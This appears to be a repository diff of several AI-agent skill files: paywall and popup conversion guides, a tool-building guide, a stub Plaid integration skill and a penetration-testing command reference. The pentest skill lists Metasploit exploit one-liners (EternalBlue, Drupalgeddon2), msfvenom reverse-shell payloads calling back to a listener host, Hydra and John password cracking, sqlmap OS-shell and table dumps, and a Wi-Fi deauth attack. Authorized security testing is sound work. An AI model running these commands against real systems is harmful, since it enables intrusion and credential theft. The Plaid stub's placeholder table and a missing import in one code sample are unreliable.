- Success metrics from upgraded users
### 6. CTA
- Specific: "Upgrade to Pro" not "Upgrade"
- Value-oriented: "Start Getting [Benefit]"
- If trial: "Start Free Trial"
### 7. Escape Hatch
- Clear "Not now" or "Continue with Free"
- Don't make them feel bad
- "Maybe later" vs. "No, I'll stay limited"
---
## Specific Paywall Types
### Feature Lock Paywall
When clicking a paid feature:
```
[Lock Icon]
This feature is available on Pro
[Feature preview/screenshot]
[Feature name] helps you [benefit]:
• [Specific capability]
• [Specific capability]
• [Specific capability]
[Upgrade to Pro - $X/mo]
[Maybe Later]
```
### Usage Limit Paywall
When hitting a limit:
```
You've reached your free limit
[Visual: Progress bar at 100%]
Free plan: 3 projects
Pro plan: Unlimited projects
You're active! Upgrade to keep building.
[Upgrade to Pro] [Delete a project]
```
### Trial Expiration Paywall
When trial is ending:
```
Your trial ends in 3 days
What you'll lose:
• [Feature they've used]
• [Feature they've used]
• [Data/work they've created]
What you've accomplished:
• Created X projects
• [Specific value metric]
[Continue with Pro - $X/mo]
[Remind me later] [Downgrade to Free]
```
### Soft Upgrade Prompt
Non-blocking suggestion:
```
[Banner or subtle modal]
You've been using [Product] for 2 weeks!
Teams like yours get X% more [value] with Pro.
[See Pro Features] [Dismiss]
```
### Team/Seat Upgrade
When adding users:
```
Invite your team
Your plan: Solo (1 user)
Team plans start at $X/user
• Shared projects
• Collaboration features
• Admin controls
[Upgrade to Team] [Continue Solo]
```
---
## Mobile Paywall Patterns
### iOS/Android Conventions
- System-like styling builds trust
- Standard paywall patterns users recognize
- Free trial emphasis common
- Subscription terminology they expect
### Mobile-Specific UX
- Full-screen often acceptable
- Swipe to dismiss
- Large tap targets
- Plan selection with clear visual state
### App Store Considerations
- Clear pricing display
- Subscription terms visible
- Restore purchases option
- Meet review guidelines
---
## Timing and Frequency
### When to Show
- **Best**: After value moment, before frustration
- After activation/aha moment
- When hitting genuine limits
- When using adjacent-to-paid features
### When NOT to Show
- During onboarding (too early)
- When they're in a flow
- Repeatedly after dismissal
- Before they understand the product
### Frequency Rules
- Limit to X per session
- Cool-down after dismiss (days, not hours)
- Escalate urgency appropriately (trial end)
- Track annoyance signals (rage clicks, churn)
---
## Upgrade Flow Optimization
### From Paywall to Payment
- Minimize steps
- Keep them in-context if possible
- Pre-fill known information
- Show security signals
### Plan Selection
- Default to recommended plan
- Annual vs. monthly clear trade-off
- Feature comparison if helpful
- FAQ or objection handling nearby
### Checkout
- Minimal fields
- Multiple payment methods
- Trial terms clear
- Easy cancellation visible (builds trust)
### Post-Upgrade
- Immediate access to features
- Confirmation and receipt
- Guide to new features
- Celebrate the upgrade
---
## A/B Testing Paywalls
### What to Test
- Trigger timing (earlier vs. later)
- Trigger type (feature gate vs. soft prompt)
- Headline/copy variations
- Price presentation
- Trial length
- Feature emphasis
- Social proof presence
- Design/layout
### Metrics to Track
- Paywall impression rate
- Click-through to upgrade
- Upgrade completion rate
- Revenue per user
- Churn rate post-upgrade
- Time to upgrade
---
## Output Format
### Paywall Design
For each paywall:
- **Trigger**: When it appears
- **Context**: What user was doing
- **Type**: Feature gate, limit, trial, etc.
- **Copy**: Full copy with headline, body, CTA
- **Design notes**: Layout, visual elements
- **Mobile**: Mobile-specific considerations
- **Frequency**: How often shown
- **Exit path**: How to dismiss
### Upgrade Flow
- Step-by-step screens
- Copy for each step
- Decision points
- Success state
### Metrics Plan
What to measure and expected benchmarks
---
## Common Patterns by Business Model
### Freemium SaaS
- Generous free tier to build habit
- Feature gates for power features
- Usage limits for volume
- Soft prompts for heavy free users
### Free Trial
- Trial countdown prominent
- Value summary at expiration
- Grace period or easy restart
- Win-back for expired trials
### Usage-Based
- Clear usage tracking
- Alerts at thresholds (75%, 100%)
- Easy to add more without plan change
- Volume discounts visible
### Per-Seat
- Friction at invitation
- Team feature highlights
- Volume pricing clear
- Admin value proposition
---
## Anti-Patterns to Avoid
### Dark Patterns
- Hiding the close button
- Confusing plan selection
- Buried downgrade option
- Misleading urgency
- Guilt-trip copy
### Conversion Killers
- Asking before value delivered
- Too frequent prompts
- Blocking critical flows
- Unclear pricing
- Complicated upgrade process
### Trust Destroyers
- Surprise charges
- Hard-to-cancel subscriptions
- Bait and switch
- Data hostage tactics
---
## Experiment Ideas
### Trigger & Timing Experiments
**When to Show**
- Test trigger timing: after aha moment vs. at feature attempt
- Early trial reminder (7 days) vs. late reminder (1 day before)
- Show after X actions completed vs. after X days
- Test soft prompts at different engagement thresholds
- Trigger based on usage patterns vs. time-based only
**Trigger Type**
- Hard gate (can't proceed) vs. soft gate (preview + prompt)
- Feature lock vs. usage limit as primary trigger
- In-context modal vs. dedicated upgrade page
- Banner reminder vs. modal prompt
- Exit-intent on free plan pages
---
### Paywall Design Experiments
**Layout & Format**
- Full-screen paywall vs. modal overlay
- Minimal paywall (CTA-focused) vs. feature-rich paywall
- Single plan display vs. plan comparison
- Image/preview included vs. text-only
- Vertical layout vs. horizontal layout on desktop
**Value Presentation**
- Feature list vs. benefit statements
- Show what they'll lose (loss aversion) vs. what they'll gain
- Personalized value summary based on usage
- Before/after demonstration
- ROI calculator or value quantification
**Visual Elements**
- Add product screenshots or previews
- Include short demo video or GIF
- Test illustration vs. product imagery
- Animated vs. static paywall
- Progress visualization (what they've accomplished)
---
### Pricing Presentation Experiments
**Price Display**
- Show monthly vs. annual vs. both with toggle
- Highlight savings for annual ($ amount vs. % off)
- Price per day framing ("Less than a coffee")
- Show price after trial vs. emphasize "Start Free"
- Display price prominently vs. de-emphasize until click
**Plan Options**
- Single recommended plan vs. multiple tiers
- Add "Most Popular" badge to target plan
- Test number of visible plans (2 vs. 3)
- Show enterprise/custom tier vs. hide it
- Include one-time purchase option alongside subscription
**Discounts & Offers**
- First month/year discount for conversion
- Limited-time upgrade offer with countdown
- Loyalty discount based on free usage duration
- Bundle discount for annual commitment
- Referral discount for social proof
---
### Copy & Messaging Experiments
**Headlines**
- Benefit-focused ("Unlock unlimited projects") vs. feature-focused ("Get Pro features")
- Question format ("Ready to do more?") vs. statement format
- Urgency-based ("Don't lose your work") vs. value-based
- Personalized headline with user's name or usage data
- Social proof headline ("Join 10,000+ Pro users")
**CTAs**
- "Start Free Trial" vs. "Upgrade Now" vs. "Continue with Pro"
- First person ("Start My Trial") vs. second person ("Start Your Trial")
- Value-specific ("Unlock Unlimited") vs. generic ("Upgrade")
- Add urgency ("Upgrade Today") vs. no pressure
- Include price in CTA vs. separate price display
**Objection Handling**
- Add money-back guarantee messaging
- Show "Cancel anytime" prominently
- Include FAQ on paywall
- Address specific objections based on feature gated
- Add chat/support option on paywall
---
### Trial & Conversion Experiments
**Trial Structure**
- 7-day vs. 14-day vs. 30-day trial length
- Credit card required vs. not required for trial
- Full-access trial vs. limited feature trial
- Trial extension offer for engaged users
- Second trial offer for expired/churned users
**Trial Expiration**
- Countdown timer visibility (always vs. near end)
- Email reminders: frequency and timing
- Grace period after expiration vs. immediate downgrade
- "Last chance" offer with discount
- Pause option vs. immediate cancellation
**Upgrade Path**
- One-click upgrade from paywall vs. separate checkout
- Pre-filled payment info for returning users
- Multiple payment methods offered
- Quarterly plan option alongside monthly/annual
- Team invite flow for solo-to-team conversion
---
### Personalization Experiments
**Usage-Based**
- Personalize paywall copy based on features used
- Highlight most-used premium features
- Show usage stats ("You've created 50 projects")
- Recommend plan based on behavior patterns
- Dynamic feature emphasis based on user segment
**Segment-Specific**
- Different paywall for power users vs. casual users
- B2B vs. B2C messaging variations
- Industry-specific value propositions
- Role-based feature highlighting
- Traffic source-based messaging
---
### Frequency & UX Experiments
**Frequency Capping**
- Test number of prompts per session
- Cool-down period after dismiss (hours vs. days)
- Escalating urgency over time vs. consistent messaging
- Once per feature vs. consolidated prompts
- Re-show rules after major engagement
**Dismiss Behavior**
- "Maybe later" vs. "No thanks" vs. "Remind me tomorrow"
- Ask reason for declining
- Offer alternative (lower tier, annual discount)
- Exit survey on dismiss
- Friendly vs. neutral decline copy
---
## Questions to Ask
If you need more context:
1. What's your current free → paid conversion rate?
2. What triggers upgrade prompts today?
3. What features are behind the paywall?
4. What's your "aha moment" for users?
5. What pricing model? (per seat, usage, flat)
6. Mobile app, web app, or both?
---
## Related Skills
- **page-cro**: For public pricing page optimization
- **onboarding-cro**: For driving to aha moment before upgrade
- **ab-test-setup**: For testing paywall variations
- **analytics-tracking**: For measuring upgrade funnel

435
skills/pentest-commands/SKILL.md Normal file
View File

@@ -0,0 +1,435 @@
---
name: Pentest Commands
description: This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references.
---
# Pentest Commands
## Purpose
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
## Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax
## Outputs/Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
## Core Workflow
### 1. Nmap Commands
**Host Discovery:**
```bash
# Ping sweep
nmap -sP 192.168.1.0/24
# List IPs without scanning
nmap -sL 192.168.1.0/24
# Ping scan (host discovery)
nmap -sn 192.168.1.0/24
```
**Port Scanning:**
```bash
# TCP SYN scan (stealth)
nmap -sS 192.168.1.1
# Full TCP connect scan
nmap -sT 192.168.1.1
# UDP scan
nmap -sU 192.168.1.1
# All ports (1-65535)
nmap -p- 192.168.1.1
# Specific ports
nmap -p 22,80,443 192.168.1.1
```
**Service Detection:**
```bash
# Service versions
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Comprehensive scan
nmap -A 192.168.1.1
# Skip host discovery
nmap -Pn 192.168.1.1
```
**NSE Scripts:**
```bash
# Vulnerability scan
nmap --script vuln 192.168.1.1
# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1
# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1
# Check EternalBlue
nmap --script smb-vuln-ms17-010 192.168.1.1
# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1
# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1
# FTP anonymous
nmap --script ftp-anon 192.168.1.1
# DNS brute force
nmap --script dns-brute 192.168.1.1
# HTTP methods
nmap -p80 --script http-methods 192.168.1.1
# HTTP headers
nmap -p80 --script http-headers 192.168.1.1
# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1
```
**Advanced Scans:**
```bash
# Xmas scan
nmap -sX 192.168.1.1
# ACK scan (firewall detection)
nmap -sA 192.168.1.1
# Window scan
nmap -sW 192.168.1.1
# Traceroute
nmap --traceroute 192.168.1.1
```
### 2. Metasploit Commands
**Basic Usage:**
```bash
# Launch Metasploit
msfconsole
# Search for exploits
search type:exploit name:smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
# Set target
set RHOST 192.168.1.1
# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp
# Run exploit
exploit
```
**Common Exploits:**
```bash
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
```
**Scanners:**
```bash
# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
```
**Handler Setup:**
```bash
# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
```
**Payload Generation (msfvenom):**
```bash
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
# PHP reverse shell
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
# ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
# Python payload
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
```
### 3. Nikto Commands
```bash
# Basic scan
nikto -h http://192.168.1.1
# Comprehensive scan
nikto -h http://192.168.1.1 -C all
# Output to file
nikto -h http://192.168.1.1 -output report.html
# Plugin-based scans
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
# Export to Metasploit
nikto -h http://192.168.1.1 -Format msf+
# Specific tuning
nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only
```
### 4. SQLMap Commands
```bash
# Basic injection test
sqlmap -u "http://192.168.1.1/page?id=1"
# Enumerate databases
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
# Enumerate tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
# OS shell
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
# POST request
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
# Cookie injection
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
# Bypass WAF
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
# Risk and level
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
```
### 5. Hydra Commands
```bash
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
# SMB brute force
hydra -l admin -P passwords.txt smb://192.168.1.1
# RDP brute force
hydra -l admin -P passwords.txt rdp://192.168.1.1
# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.1
# Username list
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
```
### 6. John the Ripper Commands
```bash
# Crack password file
john hash.txt
# Specify wordlist
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked passwords
john hash.txt --show
# Specify format
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
# SSH key passphrase
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# ZIP password
zip2john file.zip > zip_hash.txt
john zip_hash.txt
```
### 7. Aircrack-ng Commands
```bash
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```
### 8. Wireshark/Tshark Commands
```bash
# Capture traffic
tshark -i eth0 -w capture.pcap
# Read capture file
tshark -r capture.pcap
# Filter by protocol
tshark -r capture.pcap -Y "http"
# Filter by IP
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
# Extract HTTP data
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
```
## Quick Reference
### Common Port Scans
```bash
# Quick scan
nmap -F 192.168.1.1
# Full comprehensive
nmap -sV -sC -A -p- 192.168.1.1
# Fast with version
nmap -sV -T4 192.168.1.1
```
### Password Hash Types
| Mode | Type |
|------|------|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast |
## Constraints
- Always have written authorization
- Some scans are noisy and detectable
- Brute forcing may lock accounts
- Rate limiting affects tools
## Examples
### Example 1: Quick Vulnerability Scan
```bash
nmap -sV --script vuln 192.168.1.1
```
### Example 2: Web App Test
```bash
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
```
## Troubleshooting
| Issue | Solution |
|-------|----------|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |

289
skills/personal-tool-builder/SKILL.md Normal file
View File

@@ -0,0 +1,289 @@
---
name: personal-tool-builder
description: "Expert in building custom tools that solve your own problems first. The best products often start as personal tools - scratch your own itch, build for yourself, then discover others have the same itch. Covers rapid prototyping, local-first apps, CLI tools, scripts that grow into products, and the art of dogfooding. Use when: build a tool, personal tool, scratch my itch, solve my problem, CLI tool."
source: vibeship-spawner-skills (Apache 2.0)
---
# Personal Tool Builder
**Role**: Personal Tool Architect
You believe the best tools come from real problems. You've built dozens of
personal tools - some stayed personal, others became products used by thousands.
You know that building for yourself means you have perfect product-market fit
with at least one user. You build fast, iterate constantly, and only polish
what proves useful.
## Capabilities
- Personal productivity tools
- Scratch-your-own-itch methodology
- Rapid prototyping for personal use
- CLI tool development
- Local-first applications
- Script-to-product evolution
- Dogfooding practices
- Personal automation
## Patterns
### Scratch Your Own Itch
Building from personal pain points
**When to use**: When starting any personal tool
```javascript
## The Itch-to-Tool Process
### Identifying Real Itches
```
Good itches:
- "I do this manually 10x per day"
- "This takes me 30 minutes every time"
- "I wish X just did Y"
- "Why doesn't this exist?"
Bad itches (usually):
- "People should want this"
- "This would be cool"
- "There's a market for..."
- "AI could probably..."
```
### The 10-Minute Test
| Question | Answer |
|----------|--------|
| Can you describe the problem in one sentence? | Required |
| Do you experience this problem weekly? | Must be yes |
| Have you tried solving it manually? | Must have |
| Would you use this daily? | Should be yes |
### Start Ugly
```
Day 1: Script that solves YOUR problem
- No UI, just works
- Hardcoded paths, your data
- Zero error handling
- You understand every line
Week 1: Script that works reliably
- Handle your edge cases
- Add the features YOU need
- Still ugly, but robust
Month 1: Tool that might help others
- Basic docs (for future you)
- Config instead of hardcoding
- Consider sharing
```
```
### CLI Tool Architecture
Building command-line tools that last
**When to use**: When building terminal-based tools
```python
## CLI Tool Stack
### Node.js CLI Stack
```javascript
// package.json
{
"name": "my-tool",
"version": "1.0.0",
"bin": {
"mytool": "./bin/cli.js"
},
"dependencies": {
"commander": "^12.0.0", // Argument parsing
"chalk": "^5.3.0", // Colors
"ora": "^8.0.0", // Spinners
"inquirer": "^9.2.0", // Interactive prompts
"conf": "^12.0.0" // Config storage
}
}
// bin/cli.js
#!/usr/bin/env node
import { Command } from 'commander';
import chalk from 'chalk';
const program = new Command();
program
.name('mytool')
.description('What it does in one line')
.version('1.0.0');
program
.command('do-thing')
.description('Does the thing')
.option('-v, --verbose', 'Verbose output')
.action(async (options) => {
// Your logic here
});
program.parse();
```
### Python CLI Stack
```python
# Using Click (recommended)
import click
@click.group()
def cli():
"""Tool description."""
pass
@cli.command()
@click.option('--name', '-n', required=True)
@click.option('--verbose', '-v', is_flag=True)
def process(name, verbose):
"""Process something."""
click.echo(f'Processing {name}')
if __name__ == '__main__':
cli()
```
### Distribution
| Method | Complexity | Reach |
|--------|------------|-------|
| npm publish | Low | Node devs |
| pip install | Low | Python devs |
| Homebrew tap | Medium | Mac users |
| Binary release | Medium | Everyone |
| Docker image | Medium | Tech users |
```
### Local-First Apps
Apps that work offline and own your data
**When to use**: When building personal productivity apps
```python
## Local-First Architecture
### Why Local-First for Personal Tools
```
Benefits:
- Works offline
- Your data stays yours
- No server costs
- Instant, no latency
- Works forever (no shutdown)
Trade-offs:
- Sync is hard
- No collaboration (initially)
- Platform-specific work
```
### Stack Options
| Stack | Best For | Complexity |
|-------|----------|------------|
| Electron + SQLite | Desktop apps | Medium |
| Tauri + SQLite | Lightweight desktop | Medium |
| Browser + IndexedDB | Web apps | Low |
| PWA + OPFS | Mobile-friendly | Low |
| CLI + JSON files | Scripts | Very Low |
### Simple Local Storage
```javascript
// For simple tools: JSON file storage
import { readFileSync, writeFileSync, existsSync } from 'fs';
import { homedir } from 'os';
import { join } from 'path';
const DATA_DIR = join(homedir(), '.mytool');
const DATA_FILE = join(DATA_DIR, 'data.json');
function loadData() {
if (!existsSync(DATA_FILE)) return { items: [] };
return JSON.parse(readFileSync(DATA_FILE, 'utf8'));
}
function saveData(data) {
if (!existsSync(DATA_DIR)) mkdirSync(DATA_DIR);
writeFileSync(DATA_FILE, JSON.stringify(data, null, 2));
}
```
### SQLite for More Complex Tools
```javascript
// better-sqlite3 for Node.js
import Database from 'better-sqlite3';
import { join } from 'path';
import { homedir } from 'os';
const db = new Database(join(homedir(), '.mytool', 'data.db'));
// Create tables on first run
db.exec(`
CREATE TABLE IF NOT EXISTS items (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP
)
`);
// Fast synchronous queries
const items = db.prepare('SELECT * FROM items').all();
```
```
## Anti-Patterns
### ❌ Building for Imaginary Users
**Why bad**: No real feedback loop.
Building features no one needs.
Giving up because no motivation.
Solving the wrong problem.
**Instead**: Build for yourself first.
Real problem = real motivation.
You're the first tester.
Expand users later.
### ❌ Over-Engineering Personal Tools
**Why bad**: Takes forever to build.
Harder to modify later.
Complexity kills motivation.
Perfect is enemy of done.
**Instead**: Minimum viable script.
Add complexity when needed.
Refactor only when it hurts.
Ugly but working > pretty but incomplete.
### ❌ Not Dogfooding
**Why bad**: Missing obvious UX issues.
Not finding real bugs.
Features that don't help.
No passion for improvement.
**Instead**: Use your tool daily.
Feel the pain of bad UX.
Fix what annoys YOU.
Your needs = user needs.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Tool only works in your specific environment | medium | ## Making Tools Portable |
| Configuration becomes unmanageable | medium | ## Taming Configuration |
| Personal tool becomes unmaintained | low | ## Sustainable Personal Tools |
| Personal tools with security vulnerabilities | high | ## Security in Personal Tools |
## Related Skills
Works well with: `micro-saas-launcher`, `browser-extension-builder`, `workflow-automation`, `backend`

50
skills/plaid-fintech/SKILL.md Normal file
View File

@@ -0,0 +1,50 @@
---
name: plaid-fintech
description: "Expert patterns for Plaid API integration including Link token flows, transactions sync, identity verification, Auth for ACH, balance checks, webhook handling, and fintech compliance best practices. Use when: plaid, bank account linking, bank connection, ach, account aggregation."
source: vibeship-spawner-skills (Apache 2.0)
---
# Plaid Fintech
## Patterns
### Link Token Creation and Exchange
Create a link_token for Plaid Link, exchange public_token for access_token.
Link tokens are short-lived, one-time use. Access tokens don't expire but
may need updating when users change passwords.
### Transactions Sync
Use /transactions/sync for incremental transaction updates. More efficient
than /transactions/get. Handle webhooks for real-time updates instead of
polling.
### Item Error Handling and Update Mode
Handle ITEM_LOGIN_REQUIRED errors by putting users through Link update mode.
Listen for PENDING_DISCONNECT webhook to proactively prompt users.
## Anti-Patterns
### ❌ Storing Access Tokens in Plain Text
### ❌ Polling Instead of Webhooks
### ❌ Ignoring Item Errors
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |

449
skills/popup-cro/SKILL.md Normal file
View File

@@ -0,0 +1,449 @@
---
name: popup-cro
description: When the user wants to create or optimize popups, modals, overlays, slide-ins, or banners for conversion purposes. Also use when the user mentions "exit intent," "popup conversions," "modal optimization," "lead capture popup," "email popup," "announcement banner," or "overlay." For forms outside of popups, see form-cro. For general page conversion optimization, see page-cro.
---
# Popup CRO
You are an expert in popup and modal optimization. Your goal is to create popups that convert without annoying users or damaging brand perception.
## Initial Assessment
Before providing recommendations, understand:
1. **Popup Purpose**
- Email/newsletter capture
- Lead magnet delivery
- Discount/promotion
- Announcement
- Exit intent save
- Feature promotion
- Feedback/survey
2. **Current State**
- Existing popup performance?
- What triggers are used?
- User complaints or feedback?
- Mobile experience?
3. **Traffic Context**
- Traffic sources (paid, organic, direct)
- New vs. returning visitors
- Page types where shown
---
## Core Principles
### 1. Timing Is Everything
- Too early = annoying interruption
- Too late = missed opportunity
- Right time = helpful offer at moment of need
### 2. Value Must Be Obvious
- Clear, immediate benefit
- Relevant to page context
- Worth the interruption
### 3. Respect the User
- Easy to dismiss
- Don't trap or trick
- Remember preferences
- Don't ruin the experience
---
## Trigger Strategies
### Time-Based
- **Not recommended**: "Show after 5 seconds"
- **Better**: "Show after 30-60 seconds" (proven engagement)
- Best for: General site visitors
### Scroll-Based
- **Typical**: 25-50% scroll depth
- Indicates: Content engagement
- Best for: Blog posts, long-form content
- Example: "You're halfway through—get more like this"
### Exit Intent
- Detects cursor moving to close/leave
- Last chance to capture value
- Best for: E-commerce, lead gen
- Mobile alternative: Back button or scroll up
### Click-Triggered
- User initiates (clicks button/link)
- Zero annoyance factor
- Best for: Lead magnets, gated content, demos
- Example: "Download PDF" → Popup form
### Page Count / Session-Based
- After visiting X pages
- Indicates research/comparison behavior
- Best for: Multi-page journeys
- Example: "Been comparing? Here's a summary..."
### Behavior-Based
- Add to cart abandonment
- Pricing page visitors
- Repeat page visits
- Best for: High-intent segments
---
## Popup Types
### Email Capture Popup
**Goal**: Newsletter/list subscription
**Best practices:**
- Clear value prop (not just "Subscribe")
- Specific benefit of subscribing
- Single field (email only)
- Consider incentive (discount, content)
**Copy structure:**
- Headline: Benefit or curiosity hook
- Subhead: What they get, how often
- CTA: Specific action ("Get Weekly Tips")
### Lead Magnet Popup
**Goal**: Exchange content for email
**Best practices:**
- Show what they get (cover image, preview)
- Specific, tangible promise
- Minimal fields (email, maybe name)
- Instant delivery expectation
### Discount/Promotion Popup
**Goal**: First purchase or conversion
**Best practices:**
- Clear discount (10%, $20, free shipping)
- Deadline creates urgency
- Single use per visitor
- Easy to apply code
### Exit Intent Popup
**Goal**: Last-chance conversion
**Best practices:**
- Acknowledge they're leaving
- Different offer than entry popup
- Address common objections
- Final compelling reason to stay
**Formats:**
- "Wait! Before you go..."
- "Forget something?"
- "Get 10% off your first order"
- "Questions? Chat with us"
### Announcement Banner
**Goal**: Site-wide communication
**Best practices:**
- Top of page (sticky or static)
- Single, clear message
- Dismissable
- Links to more info
- Time-limited (don't leave forever)
### Slide-In
**Goal**: Less intrusive engagement
**Best practices:**
- Enters from corner/bottom
- Doesn't block content
- Easy to dismiss or minimize
- Good for chat, support, secondary CTAs
---
## Design Best Practices
### Visual Hierarchy
1. Headline (largest, first seen)
2. Value prop/offer (clear benefit)
3. Form/CTA (obvious action)
4. Close option (easy to find)
### Sizing
- Desktop: 400-600px wide typical
- Don't cover entire screen
- Mobile: Full-width bottom or center, not full-screen
- Leave space to close (visible X, click outside)
### Close Button
- Always visible (top right is convention)
- Large enough to tap on mobile
- "No thanks" text link as alternative
- Click outside to close
### Mobile Considerations
- Can't detect exit intent (use alternatives)
- Full-screen overlays feel aggressive
- Bottom slide-ups work well
- Larger touch targets
- Easy dismiss gestures
### Imagery
- Product image or preview
- Face if relevant (increases trust)
- Minimal for speed
- Optional—copy can work alone
---
## Copy Formulas
### Headlines
- Benefit-driven: "Get [result] in [timeframe]"
- Question: "Want [desired outcome]?"
- Command: "Don't miss [thing]"
- Social proof: "Join [X] people who..."
- Curiosity: "The one thing [audience] always get wrong about [topic]"
### Subheadlines
- Expand on the promise
- Address objection ("No spam, ever")
- Set expectations ("Weekly tips in 5 min")
### CTA Buttons
- First person works: "Get My Discount" vs "Get Your Discount"
- Specific over generic: "Send Me the Guide" vs "Submit"
- Value-focused: "Claim My 10% Off" vs "Subscribe"
### Decline Options
- Polite, not guilt-trippy
- "No thanks" / "Maybe later" / "I'm not interested"
- Avoid manipulative: "No, I don't want to save money"
---
## Frequency and Rules
### Frequency Capping
- Show maximum once per session
- Remember dismissals (cookie/localStorage)
- 7-30 days before showing again
- Respect user choice
### Audience Targeting
- New vs. returning visitors (different needs)
- By traffic source (match ad message)
- By page type (context-relevant)
- Exclude converted users
- Exclude recently dismissed
### Page Rules
- Exclude checkout/conversion flows
- Consider blog vs. product pages
- Match offer to page context
---
## Compliance and Accessibility
### GDPR/Privacy
- Clear consent language
- Link to privacy policy
- Don't pre-check opt-ins
- Honor unsubscribe/preferences
### Accessibility
